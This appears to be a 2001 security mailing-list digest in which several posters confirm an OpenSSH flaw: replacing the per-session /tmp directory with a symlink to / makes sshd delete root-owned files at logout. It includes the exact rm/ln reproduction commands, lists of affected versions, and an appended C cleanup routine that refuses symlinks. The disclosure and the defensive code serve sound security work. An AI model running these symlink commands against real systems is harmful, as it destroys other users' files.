Re: SSH allows deletion of other users files...

From: aleph1at_private
Date: Tue Jun 05 2001 - 10:30:37 PDT


    Tomas Ericsson <teat_private>
    
    The vulnerability works perfectly for me:
    sshd version OpenSSH_2.3.0 greenat_private 20010321
    
    # uname -a
    FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
    rootat_private:/usr/src/sys/compile/GENERIC  alpha
    
    [root@myhost root]# echo "testing">/cookies
    [root@myhost root]# ls -l /cookies
    -rw-r--r--  1 root  wheel  8 Jun  5 01:48 /cookies
    [root@myhost root]# ssh -l te myhost
    [te@myhost te]# rm -rf /tmp/ssh-1i24iea5
    [te@myhost te]# ln -s / /tmp/ssh-1i24iea5
    [te@myhost te]# logout
    [root@myhost root]# ls -l /cookies
    ls: /cookies: No such file or directory
    
    
    Shannon Lee <shannonat_private>
    
    reproduced with OpenSSH_2.3.0p1 on redhat 6.2.
    
    
    TE <teat_private>
    
    This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
    updated packages from RedHat installed.
    
    RH71# uname -a
    Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
    RH71# rpm -qa|grep openssh-server
    openssh-server-2.5.2p2-5
    
    RH70# uname -a 
    Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
    RH70# rpm -qa|grep openssh-server
    openssh-server-2.5.2p2-1.7.2 
    
    
    "David Thiel" <dthielat_private>
    
    I tested this on 4.3-RELEASE, and was successful.
    SSH Version OpenSSH_2.3.0 greenat_private 20010321
    
    
    KF <dotslashat_private>
    
    Works on my box
    
    [root@bounce dotslash]# cat /etc/redhat-release
    Red Hat Linux release 7.0 (Guinness)
    [root@bounce dotslash]# ssh -V
    SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
    Compiled with SSL (0x0090581f).
    
    
    Jan-Frode Myklebust <janfrodeat_private>
    
    I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
    and OpenSSH_2.9p1 on IRIX 6.5 and both are
    vulnerable to this. I used protocol version 2 on
    both machines.
    
    
    Luciano Miguel Ferreira Rocha <strangeat_private>
    
    Confirmed on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
    X forwarding activated.
    
    
    "Golden_Eternity" <bhodiat_private>
    
    I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
    locate the /tmp/ssh-* directory.
    
    What version of ssh were you using when you discovered this?
    
    [test@shiva test]$ ssh test@localhost
    warning: Need basic cursor movement capablity, using vt100
    test's password:
    Authentication successful.
    Last login: Mon Jun 04 2001 10:42:08 -0700
    No mail.
    [test@shiva test]$ ls -l /tmp/
    total 12
    drwxr-xr-x    2 root     root        12288 Apr  8 11:59 lost+found
    [test@shiva test]$
    
    
    "Schlosser, Matt D." <mschlosserat_private>
    
    On the contrary, it just takes another form:
    
    [root@bob /root]# touch /cookies;ls /cookies
    /cookies
    [root@bob /root]# ssh zen@localhost
    zen@localhost's password:
    [zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
    [zen@bob zen]$ logout
    Connection to localhost closed.
    [root@bob /root]# ls /cookies
    /bin/ls: /cookies: No such file or directory
    
    -- 
    Elias Levy
    SecurityFocus.com
    http://www.securityfocus.com/
    Si vis pacem, para bellum
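
The transcripts above show a root-owned /cookies disappearing at logout once the session directory under /tmp has been replaced by a symlink to /. As an added example (not OpenSSH code and not from any poster in this thread), here is a C cleanup routine that refuses a symlinked path. The function names, the owner and permission checks, and the constructed test directory are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Remove a per-session directory (such as the /tmp/ssh-XXXXXXXX seen above)
 * and its "cookies" file without following a symlink planted at that path.
 * Returns 0 on success, -1 if the path was refused or removal failed. */
int safe_cleanup(const char *dir, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: fail if the last path component is a symlink.
     * O_DIRECTORY: fail if it is anything other than a directory. */
    int fd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    /* Inspect the object that was opened, not the name it was opened by. */
    if (fstat(fd, &st) != 0 || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    /* Delete only the expected file, relative to the verified directory. */
    unlinkat(fd, "cookies", 0);
    close(fd);
    /* rmdir() fails on a symlink and on a directory that is not empty. */
    return rmdir(dir) == 0 ? 0 : -1;
}

/* Constructed case: a "cookies" file in a real directory, reached through a
 * symlink standing in for the session directory. Returns 1 if the cleanup
 * was refused and the file survived, 0 if not, -1 on setup failure. */
int symlink_case_survives(void)
{
    char real[] = "/tmp/demo-realXXXXXX", lnk[64], file[64];
    if (!mkdtemp(real)) return -1;
    snprintf(lnk, sizeof lnk, "%s.lnk", real);
    snprintf(file, sizeof file, "%s/cookies", real);
    close(open(file, O_CREAT | O_WRONLY, 0600));
    if (symlink(real, lnk) != 0) return -1;
    int refused = safe_cleanup(lnk, getuid()) == -1;
    int survived = access(file, F_OK) == 0;
    unlink(lnk); unlink(file); rmdir(real);
    return refused && survived;
}

int main(void) { return symlink_case_survives() == 1 ? 0 : 1; }
```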
    


